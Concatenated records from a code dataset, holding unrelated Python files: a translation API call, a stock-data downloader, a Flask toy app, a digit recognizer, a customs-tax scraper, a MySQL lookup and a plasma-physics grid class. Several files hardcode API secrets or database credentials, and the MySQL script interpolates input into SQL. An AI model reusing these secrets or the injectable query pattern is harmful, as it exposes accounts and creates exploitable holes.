np.around(pred[0],2)\n \n ax1.set_title(title, fontsize=20,)\n \n fig.add_subplot(111, frameon=False) # used for centering the y-axis label\n \n ax1.plot(time[(rnum,inputg)]/60, data[(rnum,inputg)], label=\"Gauge # %s\" % str(inputg), color='blue')\n ax1.grid(True)\n ax1.legend(loc='upper left')\n \n \n #Plot window of data used and reference line for threshold. \n start = starttime[winnum][runs.index(rnum)]*grid\n end = (start + (winsize[winnum]-1)*grid)\n ax1.axvline(start/60, color ='red', ls='--', lw=1, alpha = 0.8)\n ax1.axvline(end/60, color ='red', ls='--', lw=1, alpha = 0.8)\n\n ax2.plot(time[(rnum,gaugeno)]/60, data[(rnum,gaugeno)], label='Gauge # %s' % str(gaugeno), color='blue')\n ax2.grid(True)\n ax2.legend(loc='upper left')\n \n plt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False) # used for centering the y-axis label\n plt.xlabel('Minutes after quake', fontsize=16)\n plt.ylabel('Surface elevation (meters)', fontsize=16)\n \ndef save_run_plots(data, time, starttime, runs, rnums, pred, gaugeno, inputg, winnum, winsize, grid):\n \"\"\"\n Saves plots of eta for specified runs of gauge 702 and a specified gauge 9XX as a png.\n \n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n starttime - The indices where each time series met or exceeded the threshold.\n runs - List containing the run numbers used (met the threshold).\n rnums - Run numbers of interest\n pred - Predicted values for runs of interest\n gaugeno - Gauge number of interest\n inputg - Input gauge number (passed through to plot_run)\n winnum - Integer index of data set of interest\n winsize - Number of time steps to extract after threshold is met for the given dataset\n grid - Time step spacing used by plot_run to convert indices to seconds (passed through)\n \"\"\"\n for i in range(len(rnums)):\n plot_run(data, time, starttime, runs, rnums[i], gaugeno, inputg, winnum, winsize, grid, pred[i])\n plt.savefig(\"r%s_g%s.png\" % (rnums[i],gaugeno))\n\n\"\"\"\nPredict\n\"\"\"\ndef predict(scalers,models,feats):\n scalers_f = scalers\n models_f = models\n \n pred = []\n\n for i in range(len(feats)):\n model_temp = models_f[i]\n ft_temp = feats[i]\n \n if len(scalers_f) != 0:\n scale_temp = scalers_f[i]\n \n if isinstance(ft_temp,pd.DataFrame):\n ft_temp = scale_temp.transform(ft_temp[ft_temp.columns])\n else:\n ft_temp = scale_temp.transform(ft_temp.reshape(1, -1))\n\n pred.append(model_temp.predict(ft_temp)[0])\n \n return pred\n\n\"\"\"\nOld Functions\n\"\"\"\n\n# Redo documentation\n# changed to numpy arrays\n# old method\ndef train_test_split_old(data, target, runs_used, test_size, seed):\n \"\"\"\n Splits data and target into training and testing sets for a given random seed. 
Keeps track of which runs are\n put into training and testing sets.\n \n Input\n data - Dataframe of data samples\n target - np array of targets\n runs_used - np array of run numbers used\n test_size - test size as a fraction of the total samples (between 0 and 1)\n seed - seed used for random number generator\n Output\n train - Dataframe of training data\n test - Dataframe of testing data\n train_target - np array of training targets\n test_target - np array of testing targets\n train_runs - np array of run numbers in training data\n test_runs - np array of run numbers in testing data\n \n \"\"\"\n np.random.seed(seed)\n \n total = len(target)\n \n tt_size = np.round(total*test_size)\n tr_size = int(total - tt_size)\n \n perm = np.random.permutation(total)\n \n train = data[perm[:tr_size],:]\n train_target = target[perm[0:tr_size]]\n train_runs = runs_used[perm[0:tr_size]]\n \n test = data[perm[tr_size:],:]\n test_target = target[perm[tr_size:]]\n test_runs = runs_used[perm[tr_size:]]\n \n return train, test, train_target, test_target, train_runs, test_runs\n\ndef train_test_old(feat, target, runs_used, testsize, rseed, scale, c_or_r, model, *returns):\n \"\"\"\n Trains and tests the model using non-linear SVR/SVC. \n \n Input:\n feat - List of feature dataframes\n target - Array of target values for regression\n runs_used - Array of run numbers in the model\n scale - Boolean value to denote whether features should be scaled or not to unit variance and 0 mean.\n c_or_r - Value for specifying classification or regression\n *returns - Boolean value to determine whether scalers and models need to be returned.\n \n Output:\n pred - List of arrays of predictions from testing the model after it is trained\n target - List of arrays of targets that correspond to runs in the test set\n runs - List of arrays of runs used in testing.\n evs - List of explained variance scores for each dataset.\n scalers - List of standard scalers used (Optional)\n models - List of models used (Optional)\n \"\"\"\n \n pred = []\n targets = []\n tr_pred = []\n runs = []\n acc = []\n \n if returns:\n scalers = []\n models = []\n \n for i in range(len(feat)):\n train_set, test_set, train_target, test_target, train_runs, test_runs = \\\n train_test_split_old(feat[i].to_numpy(), target, np.asarray(runs_used[i]),testsize,rseed)\n \n if scale:\n scaler = StandardScaler()\n train_set = scaler.fit_transform(train_set)\n test_set = scaler.transform(test_set)\n \n model_tmp = clone(model)\n \n model_tmp.fit(train_set, train_target, sample_weight=None)\n \n pred.append(model_tmp.predict(test_set))\n tr_pred.append(model_tmp.predict(train_set))\n \n if c_or_r == 'r':\n acc.append(explained_variance_score(test_target,pred[i]))\n else:\n acc.append(accuracy_score(test_target,pred[i]))\n \n runs.append(test_runs)\n targets.append(test_target)\n \n if returns:\n models.append(model_tmp)\n if scale:\n scalers.append(scaler)\n \n if returns:\n return pred, tr_pred, targets, runs, acc, scalers, models\n else:\n return pred, tr_pred, targets, runs, acc","repo_name":"chrismhl/tsunami","sub_path":"tsunami_regress.py","file_name":"tsunami_regress.py","file_ext":"py","file_size_in_byte":23069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15755791268","text":"# Naver Papago NMT API example\nimport os\nimport sys\nimport urllib.request\n\ndef translate_lang():\n client_id = \"HnR6v1IdNhYJaslni_5v\"\n client_secret = \"ZBdGUtNIEa\"\n #encText = urllib.parse.quote(\"Enter the sentence to translate\")\n data = 
\"source=es&target=ko&text=quiero tomar una cerveza.\"\n url = \"https://openapi.naver.com/v1/papago/n2mt\"\n request = urllib.request.Request(url)\n request.add_header(\"X-Naver-Client-Id\",client_id)\n request.add_header(\"X-Naver-Client-Secret\",client_secret)\n response = urllib.request.urlopen(request, data=data.encode(\"utf-8\"))\n rescode = response.getcode()\n if(rescode==200):\n response_body = response.read()\n print(response_body.decode('utf-8'))\n else:\n print(\"Error Code:\" + str(rescode))\n return ","repo_name":"Nenemttin/TIL","sub_path":"0_startcamp/day4/dafd.py","file_name":"dafd.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34905678104","text":"import os\nimport re\nimport sys\n\nimport baostock as bs\nimport pandas as pd\nfrom tqdm import tqdm\n\nRE_CODE_NUM = re.compile(\"\\d+\")\n\nlg = bs.login()\n\n\ndef deal_time(time_string):\n time_string = time_string[:12]\n date = \"-\".join([time_string[:4], time_string[4:6], time_string[6:8]])\n hm = \":\".join([time_string[8:10], time_string[10:12]])\n findall_time = \"{} {}\".format(date, hm)\n return findall_time\n\n\ndef get_daily_data(code, start_date, end_date):\n rs = bs.query_history_k_data_plus(\n code,\n \"date,open,high,low,close,volume\",\n start_date=start_date,\n end_date=end_date,\n frequency=\"d\",\n adjustflag=\"2\",\n )\n df = parse_result(rs, set_date2index=True, to_float=True)\n return df\n\n\ndef parse_result(rs, set_date2index=False, set_time2index=False, to_float=False):\n data_list = []\n while (rs.error_code == \"0\") & rs.next():\n data_list.append(rs.get_row_data())\n df = pd.DataFrame(data_list, columns=rs.fields)\n if len(df) == 0:\n raise Exception(rs.error_msg)\n if set_date2index:\n df.index = df.pop(\"date\")\n if set_time2index:\n times = df.pop(\"time\")\n times = [deal_time(t) for t in times]\n df.index = times\n df.pop(\"date\")\n if to_float:\n df = df.astype(float).round(3)\n return df\n\n\ndef get_zhongzheng500(day=None, only_code=False):\n rs = bs.query_zz500_stocks()\n df = parse_result(rs)\n if only_code:\n return list(df[\"code\"])\n df[\"base_code\"] = df[\"code\"].apply(lambda x: RE_CODE_NUM.findall(x)[0])\n return df\n\n\ndef get_stock_pool():\n\n rs = bs.query_stock_basic()\n all_stocks = parse_result(rs)\n\n all_stocks[~all_stocks[\"outDate\"].apply(lambda x: bool(x.strip()))]\n all_stocks = all_stocks[all_stocks[\"type\"] == \"1\"]\n codes = set(all_stocks[\"code\"])\n return codes\n\n\ndef download_stock(code, save_folder, start_date=None, end_date=None):\n\n start_date = start_date or \"2020-01-01\"\n try:\n df = get_daily_data(code, start_date, end_date)\n except Exception:\n print(\"download {} {}-{} error\".format(code, start_date, end_date,))\n return 0\n file_name = os.path.join(save_folder, \"{}.csv\".format(code))\n df.to_csv(file_name)\n return df\n","repo_name":"jieguangzhou/DolphinScheduler-MLOps-Stock-Analysis","sub_path":"dmsa/data_api/china_daily_data.py","file_name":"china_daily_data.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"169473965","text":"import datetime\nimport time\nimport models\nfrom flask import Flask\nfrom form import LoginForm\nfrom flask import render_template\nfrom flask import request,redirect\nfrom flask import url_for,flash\nfrom flask import session\nfrom flask import make_response\n\napp = 
Flask(__name__)\n\n@app.route('/hello')\ndef hello():\n pass\n name = request.args.get('name','Flask')\n return 'Hello %s'%name\n@app.route('/login',methods=['GET','POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n elif request.method=='POST':\n user = request.values.get('user')\n pwd = request.values.get('pwd')\n return 'hello world'\n\n@app.route('/register',methods=['GET','POST'])\ndef register():\n if request.method == 'GET':\n return render_template('register.html')\n elif request.method=='POST':\n user = request.values.get('user')\n pwd = request.values.get('pwd')\n pwd2 = request.values.get('pwd2')\n if user:\n if pwd == pwd2:\n pass\n return redirect('/login')\n\n# app.secret_key = 'SET_ME_BEFORE_USER_SESSION'\napp.secret_key = 'secret string'\n@app.route('/flush')\ndef flush():\n flash('I am Flash')\n\n return redirect(url_for('login'))\n@app.route('/index')\ndef index():\n session['key_time'] = datetime.datetime.now().strftime('%Y-%m-%d')\n return session['key_time']\n@app.route('/read/')\ndef read(year):\n return 'Welcome to %s'%year\n # return session.get('key_time')\n@app.route('/rend')\ndef renders():\n return '',302,{'Location':\"hello\"}\n# with app.test_request_context():\n# print(url_for('hello'))\n# print(url_for('login'))\n@app.route('/set/')\ndef set_cook(name):\n response = make_response(url_for('hello'))\n response.set_cookie('name',name)\n return response\n@app.route('/ser')\ndef ser_session():\n if 'logged_in' in session:\n return 'Welcome'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"zgd0228/flask_","sub_path":"zgd_person/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24935997306","text":"def take_position(a):\n arg_1, arg_2 = a.strip(\"()\").split(\", \")\n return [int(arg_1), int(arg_2)]\n \n # part_1, part_2 = a.split(\",\")\n # r = int(part_1[1:])\n # c = int(part_2[1:len(part_2) - 1])\n # return [r, c]\n\n\ndef find_mines(pos):\n check_positions = set((r + pos[0], c + pos[1]) for r in range(-1, 2) for c in range(-1, 2))\n valid_positions = check_positions.intersection(field_positions)\n return [field[pos[0]][pos[1]] for pos in valid_positions].count(\"*\")\n\n\nsize = int(input())\nbomb_count = int(input())\nfield = [[0] * size for row in range(size)]\nfield_positions = set([(x, y) for x in range(size) for y in range(size)])\n\nfor _ in range(bomb_count):\n position = take_position(input())\n field[position[0]][position[1]] = \"*\"\n\nfor row in range(size):\n for col in range(size):\n if field[row][col] != \"*\":\n field[row][col] = find_mines([row, col])\n\n[print(f\"{' '.join(str(x) for x in row)}\") for row in field]\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exams/August 2020 Retake/mine_sweeper_generator.py","file_name":"mine_sweeper_generator.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70480509289","text":"__author__ = \"Gianluca Fiore\"\n__copyright__ = \"\"\n__credits__ = \"\"\n__license__ = \"GPL\"\n__version__ = \"\"\n__mantainer__ = \"\"\n__date__ = \"2021/01/04\"\n__email__ = \"\"\n__status__ = \"\"\n\nimport sys\nimport yaml\n\ndef main():\n # input file needs to be redirected to script, as: validate_yaml.py < file.yaml\n print(yaml.safe_load(sys.stdin))\n\nif __name__ == '__main__':\n status = main()\n 
sys.exit(status)\n\n","repo_name":"Donearm/scripts","sub_path":"validate_yaml.py","file_name":"validate_yaml.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"53"} +{"seq_id":"42824769045","text":"import cv2\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom sklearn import neighbors,svm,metrics\n\nfrom sklearn.model_selection import train_test_split\nfrom mnist import MNIST\nfrom sklearn.externals import joblib\ndef findRoi(frame, thresValue, margin): \n rois = [] \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) \n gray2 = cv2.dilate(gray,None,iterations=2) \n gray2 = cv2.erode(gray2,None,iterations=2) \n edges = cv2.absdiff(gray,gray2) \n x = cv2.Sobel(edges,cv2.CV_16S,1,0) \n y = cv2.Sobel(edges,cv2.CV_16S,0,1) \n absX = cv2.convertScaleAbs(x) \n absY = cv2.convertScaleAbs(y) \n dst = cv2.addWeighted(absX,0.5,absY,0.5,0) \n ret, ddst = cv2.threshold(dst,thresValue,255,cv2.THRESH_BINARY) \n im, contours, hierarchy = cv2.findContours(ddst,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \n for c in contours: \n x, y, w, h = cv2.boundingRect(c)\n if w > 15 and h > 20:\n if x-margin>=0:\n x=x-margin\n w+=margin\n else:\n x=0\n w+=x\n if y-margin>=0:\n y=y-margin\n h+=margin\n else:\n y=0\n h+=y\n if x+w+margin0:\n output = concatenate(digits,10) \n cv2.imshow('digits', output)\n if single_flag:\n cv2.waitKey(0)\n return digits,edges,output\n\ndef getDataAndLabelFromPic(img,size_x=20,size_y=20):\n tmp=img.copy()\n digits,edges,conc=detectPicture(img,size_x=size_x,size_y=size_y)\n Nd = len(digits)\n cnt=0\n label=[]\n while cnt None:\n chrome_service = webdriver.chrome.service.Service(executable_path=ChromeDriverManager().install())\n self.driver = webdriver.Chrome(service=chrome_service)\n self.main_url = main_url\n self.driver.get(self.main_url)\n self.start()\n \n def start(self):\n try:\n df = pd.read_csv(os.path.join(\"data\",\"filtered_cars.csv\")) \n df[\"ImportPrice\"] = None\n # columns = df.columns\n tabs = WebDriverWait(self.driver, 10).until(EC.presence_of_all_elements_located((By.CLASS_NAME, \"rtsLink\")))\n tabs[1].click()\n price_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rntbValue\"\n shipping_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rntbOtherExpenses\"\n volume_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rntbVolume\"\n engine_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbEngineType_Input\"\n year_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbYearOfProduction\"\n month_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbMonthOfProduction_Input\"\n day_input_id = \"ctl00_cphContent_csOS_VehiclesCVCView_rcmbDayOfProduction\"\n month_xpath = \"//div[@id='ctl00_cphContent_csOS_VehiclesCVCView_rcmbMonthOfProduction_DropDown']//ul[@class='rcbList']/li[7]\"\n engine_xpath = \"//div[@id='ctl00_cphContent_csOS_VehiclesCVCView_rcmbEngineType_DropDown']//ul[@class='rcbList']/li[1]\" \n price_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, price_input_id)))\n shipping_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, shipping_input_id)))\n volume_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, volume_input_id)))\n day_input = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, day_input_id)))\n price_id = \"cphContent_csOS_VehiclesCVCView_lblCustomsTotalDuty\"\n shipping_input.clear()\n shipping_input.send_keys(3000)\n 
time.sleep(2)\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.ID, month_input_id))).click()\n time.sleep(2)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.XPATH, month_xpath))).click()\n time.sleep(2)\n day_input.clear()\n day_input.send_keys(10)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.ID, engine_input_id))).click()\n time.sleep(2)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.XPATH, engine_xpath))).click()\n \n for index, row in df.iterrows():\n year = row[\"Year\"]\n price = (int(row[\"Price\"]) * 0.9) * 1.15\n engine = int(float(row[\"Engine\"]) * 1000)\n price_input.clear()\n price_input.send_keys(price)\n WebDriverWait(self.driver, 10).until(EC.element_to_be_clickable((By.ID, year_input_id))).click()\n time.sleep(2)\n WebDriverWait(self.driver,10).until(EC.element_to_be_clickable((By.XPATH, f\"//ul/li[contains(text(), '{year}')]\"))).click()\n time.sleep(2)\n volume_input.clear()\n volume_input.send_keys(engine)\n volume_input.send_keys(Keys.ENTER)\n tax_price = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, price_id))).get_attribute(\"textContent\")\n tax_price = int(int(tax_price.replace(\",\",\"\"))/390)\n df.loc[index, 'ImportPrice'] = tax_price\n time.sleep(10)\n df.loc[[index], ].to_csv(\"filtered_with_import.csv\",header = not os.path.exists(\"filtered_with_import.csv\"), index = False, mode = \"a\")\n except Exception as e:\n print(str(e))\n df.to_csv(\"filtered_cars_with_import.csv\")\n\n\n\nTaxCalculator()","repo_name":"sahNarek/data_vis_project","sub_path":"tax_scrapper.py","file_name":"tax_scrapper.py","file_ext":"py","file_size_in_byte":5141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35993239615","text":"\"\"\"\nFor your birthday, you have been given a grid of R (1 < R < 30) rows of lights, with each row containing L (1 ≤ L < 8) lights. \nLights can be in one of two states: on or off. For this question, the topmost row is row R, and the bottom-most row is row 1. \nAlso, beside all rows except the topmost row (row R), there is a button which can be pushed.\nPushing the button beside row k (1 ≤ k < R) will peform an \"exclusive-or\" operation on each light of row k, which is described \nbelow. Consider column i in row k, where 1 ≤ i ≤ L. If the lights in column i of row k and column i of row k + 1 are both the \nsame (i.e., both on, or both off), then pushing the button beside row k will cause the light in column i of row k to be off. \nIf the lights in column i of row k and column i of row k + 1 are different (i.e., one is on, and the other is off), then pushing \nthe button beside row k will cause the light in column i of row k to be on. An example is shown below, for L = 4:\nColumn Numbers\t1\t2\t3\t4\nRow k+1\ton\ton\toff\toff\nRow k before button pushed\ton\toff\ton\toff\nRow k after button pushed\toff\ton\ton\toff\nYou are told which lights are initially on and which are initially off. You must calculate how many different light patterns are possible for the bottom row by any sequence of button pushes. 
Each button may only be pressed once, but in any order.\n\"\"\"\nR = int(input())\nL = int(input())\nlights = []\nfor i in range(R):\n temp = input().split()\n temp2 = []\n for j in temp:\n temp2.append(int(j))\n lights.append(temp2)\nprev = [lights[0]]\nfor i in range(1,R):\n newprev = [lights[i]]\n cur = lights[i]\n for j in prev:\n newLights = []\n for k in range(L):\n newLights.append((cur[k]+j[k])%2)\n if newLights not in newprev:\n newprev.append(newLights)\n prev = newprev[::]\nprint(len(prev))\n","repo_name":"DChang87/Competitive-Programming-Solutions","sub_path":"ccc09s2.py","file_name":"ccc09s2.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40801507057","text":"import json\r\nimport mysql.connector\r\n\r\nfrom difflib import get_close_matches\r\nfrom mysql import connector\r\n\r\ndata = json.load(open(\"data.json\"))\r\n\r\ncon = mysql.connector.connect(\r\nuser = \"ardit700_student\",\r\npassword = \"ardit700_student\",\r\nhost = \"108.167.140.122\",\r\ndatabase = \"ardit700_pm1database\"\r\n)\r\n\r\nword = 'deres'\r\ncursor = con.cursor()\r\n#query = cursor.execute(\"SELECT * FROM Dictionary WHERE Expression = 'inlay'\")\r\nquery = cursor.execute(\"SELECT * FROM Dictionary WHERE Expression = '%s' \" % word)\r\n\r\n\r\nresults = cursor.fetchall()\r\n\r\n\r\nif results:\r\n for result in results:\r\n print(result)\r\nelse:\r\n print(\"no word \")\r\n","repo_name":"Gyepike/Gyakorlas","sub_path":"MegaCourse_Dic1/JASOn_Course.py","file_name":"JASOn_Course.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21924410538","text":"import os\nimport re\n\nfrom setuptools import find_packages, setup\n\n\ndef clean_html(raw_html):\n cleanr = re.compile(\"<.*?>\")\n cleantext = re.sub(cleanr, \"\", raw_html).strip()\n return cleantext\n\n\ndef _get_version():\n # get version string from version.py\n version_file = os.path.join(os.path.dirname(__file__), \"version.py\")\n version_regex = r\"__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\n with open(version_file, \"r\") as f:\n version = re.search(version_regex, f.read(), re.M).group(1)\n return version\n\n\ndef fetch_long_description():\n with open(\"README.md\", encoding=\"utf8\") as f:\n readme = f.read()\n # https://stackoverflow.com/a/12982689\n readme = clean_html(readme)\n return readme\n\n\ndef read_requirements(file):\n with open(file) as f:\n reqs = f.read()\n\n return reqs.strip().split(\"\\n\")\n\n\nDISTNAME = \"torchmultimodal\"\nDESCRIPTION = \"Multimodal modeling in PyTorch\"\nLONG_DESCRIPTION = fetch_long_description()\nLONG_DESCRIPTION_CONTENT_TYPE = \"text/markdown\"\nAUTHOR = \"PyTorch Multimodal\"\nAUTHOR_EMAIL = \"kartikayk@fb.com\"\n# Need to exclude folders in test as well so as they don't create an extra package\nEXCLUDES = (\"examples*\", \"test*\")\n\n\nif __name__ == \"__main__\":\n\n setup(\n name=DISTNAME,\n include_package_data=True,\n packages=find_packages(exclude=EXCLUDES),\n python_requires=\">=3.7\",\n install_requires=read_requirements(\"requirements.txt\"),\n version=_get_version(),\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,\n url=\"https://github.com/facebookresearch/multimodal\",\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n classifiers=[\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python 
:: 3.9\",\n \"License :: OSI Approved :: BSD License\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n extras_require={\"dev\": read_requirements(\"dev-requirements.txt\")},\n )\n","repo_name":"israfelsr/context-flava","sub_path":"multimodal/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7601502808","text":"import datetime\nfrom psychopy import gui\n\n\ndef experiment_info(observer):\n \"\"\"\n okienko dialogowe na podczas uruchomienia procedury\n :param observer: observer_id\n :return: part_id, observer_id, date\n \"\"\"\n now = datetime.datetime.now()\n date = now.strftime(\"%Y-%m-%d %H:%M\")\n\n my_dlg = gui.Dlg(title=\"Go No-Go\")\n my_dlg.addText('Subject info')\n my_dlg.addField('ID:')\n my_dlg.addField('Age:')\n my_dlg.addField('Sex:', choices=['MALE', \"FEMALE\"])\n my_dlg.addText('Observer info')\n my_dlg.addField('Observer:', observer)\n\n my_dlg.show()\n if not my_dlg.OK:\n exit(1)\n\n # id sex age observer\n return my_dlg.data[0], my_dlg.data[2], my_dlg.data[1], my_dlg.data[3], date\n","repo_name":"ociepkam/Go_No-Go","sub_path":"classes/experiment_info.py","file_name":"experiment_info.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22736448912","text":"# p/xi output momentum grid object\n\n\nimport numpy as np\nimport scipy.constants\nfrom .MomentumGrid import MomentumGrid\n\n\nclass PXiGrid(MomentumGrid):\n \n\n def __init__(self, name, rgrid, data):\n \"\"\"\n Constructor.\n\n name: Grid name.\n rgrid: Parent 'Grid' object (representing radial grid).\n data: Momentum grid data.\n \"\"\"\n super(PXiGrid, self).__init__(name=name, rgrid=rgrid, data=data)\n\n self.p1name = 'p'\n self.p2name = 'xi'\n\n self.p = data['p1']\n self.xi = data['p2']\n self.xi_f = data['p2_f']\n self.dp = data['dp1']\n self.dxi = data['dp2']\n\n self.P, self.XI = np.meshgrid(self.p[:], self.xi[:])\n self.PPAR = self.P*self.XI\n self.PPERP = self.P*np.sqrt(1-self.XI**2)\n self.GAMMA = np.sqrt(self.P**2 + 1)\n\n\n def getGamma(self):\n \"\"\"\n Returns a meshgrid representing the relativistic factor on this\n 2D momentum grid.\n \"\"\"\n return self.GAMMA\n\n\n def getVpar(self):\n \"\"\"\n Returns a meshgrid representing the parallel velocity on this\n 2D momentum grid.\n \"\"\"\n return scipy.constants.c * (self.PPAR/self.GAMMA)\n\n def getBounceAveragedVpar(self):\n \"\"\"\n Returns a meshgrid representing the integrand that should weigh\n a function when carrying out the v_par moment of a quantity.\n \n It should be identical to the ``integrand`` produced by the \n ``CurrentDensityFromDistributionFunction`` class in the DREAM kernel. 
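The _get_version helper in the setup.py record that ends above is easy to sanity-check in isolation; here is a small sketch applying the same regex to an in-memory string instead of reading version.py.

```python
# The record's version_regex, exercised against a literal string.
import re

version_regex = r"__version__ = ['\"]([^'\"]*)['\"]"
sample = '__version__ = "0.1.0"\n'
match = re.search(version_regex, sample, re.M)
print(match.group(1))  # 0.1.0
```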
\n \"\"\"\n c = scipy.constants.speed_of_light\n integrand = np.zeros(self.Vprime.shape)\n\n # Load in data from file to speed up calculation\n Vprime_VpVol = self.Vprime_VpVol[:]\n p = self.p[:]\n xi = self.xi[:]\n xi_f = self.xi_f[:]\n xi0TrappedBoundary = self.rgrid.xi0TrappedBoundary[:]\n\n # Calculate bounce averaged v||\n for ir in range(0, self.rgrid.r.size):\n xi0Trapped = xi0TrappedBoundary[ir]\n for j in range(0, xi.size):\n xi1 = xi_f[j]\n xi2 = xi_f[j+1]\n if(xi1>xi2):\n xi_t = xi1\n xi1 = xi2\n xi2 = xi_t\n \n xi0Average = 0\n if (xi2<=-xi0Trapped) or (xi1>=xi0Trapped) or ((xi1<=-xi0Trapped) and (xi2>=xi0Trapped)): \n xi0Average = xi[j]\n\n if xi0Average != 0:\n for i in range(0, p.size):\n v = c * p[i] / np.sqrt(1+p[i]**2)\n integrand[ir,j,i] = 2*np.pi * p[i]**2 * v * xi0Average / Vprime_VpVol[ir,j,i]\n\n return integrand\n\n\n\n\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Output/PXiGrid.py","file_name":"PXiGrid.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"11766370675","text":"row = int(input(\"Enter row: \"))\r\ncol = int(input(\"Enter column: \"))\r\nmatrix=[]\r\nfor i in range(1, row+1):\r\n a= []\r\n for j in range(col):\r\n k = row * j+i\r\n a.append(k)\r\n matrix.append(a)\r\n\r\nfor i in range(row):\r\n for j in range(col):\r\n print(matrix[i][j], end=\" \")\r\n print()","repo_name":"aswnvm/matrix","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2520948332","text":"import falcon\nimport datetime\nfrom db import Signin, Session, User\nfrom users import get_user\n\nclass Collection(object):\n def on_get(self, req, resp):\n user = get_user(req, resp)\n\n if user.is_admin():\n signins = Session.query(Signin).all()\n else:\n signins = Session.query(Signin).filter_by(user=user).all()\n\n signins_json = []\n for signin in signins:\n date = signin.date_in.strftime(\"%Y-%m-%d\")\n signins_json.append({'id': signin.id, 'date': date})\n\n req.context['result'] = {\n 'action': 'get signins',\n 'result': 'success',\n 'signins': signins_json\n }\n\n resp.status = falcon.HTTP_200\n\n def on_post(self, req, resp):\n doc = req.context['doc']\n lat = doc['lat']\n lon = doc['lon']\n date_in = datetime.datetime.utcnow()\n if lat and lon:\n user = get_user(req, resp)\n\n if lon >= -79.8921061:\n if lon <= -79.8833942:\n if lat <= 36.0984408:\n if lat >= 36.0903956:\n signin = Signin(date_in=date_in, user=user)\n user.signedin = True\n Session.add(signin)\n Session.commit()\n\n resp.status = falcon.HTTP_201\n resp.location = '/signins/%s' % (signin.id)\n req.context['result'] = {\"action\": \"sign in\", \"result\": \"success\"}\n else:\n resp.status = falcon.HTTP_409\n req.context['result'] = {\"action\": \"sign in\", \"result\": \"failure\"}\n\n else:\n resp.status = falcon.HTTP_409\n req.context['result'] = {\"action\": \"sign in\", \"result\": \"failure\"}\n\nclass Item(object):\n def on_get(self, req, resp, item_id):\n user = Session.query(User).get(req.context['user'])\n signin = Session.query(Signin).get(item_id)\n if signin.user == user or user.is_admin():\n date_in = signin.date_in.strftime(\"%Y-%m-%d\")\n req.context['result'] = {\n 'action': 'get signin',\n 'result': 'success',\n 'signin': {\n \"id\": signin.id,\n \"date\": date_in\n }\n }\n resp.status = falcon.HTTP_200\n else:\n 
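The matrix.py record above fills its R x C grid column-major (the cell at row i, column j holds row * j + i). A sketch of the same table built with numpy, which is not used in the record but makes the fill order explicit:

```python
# Build [1..R*C] column by column: reshape fills rows first, so reshape
# to (C, R) and transpose to get the record's column-major layout.
import numpy as np

rows, cols = 3, 4
matrix = np.arange(1, rows * cols + 1).reshape(cols, rows).T
print(matrix)
# [[ 1  4  7 10]
#  [ 2  5  8 11]
#  [ 3  6  9 12]]
```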
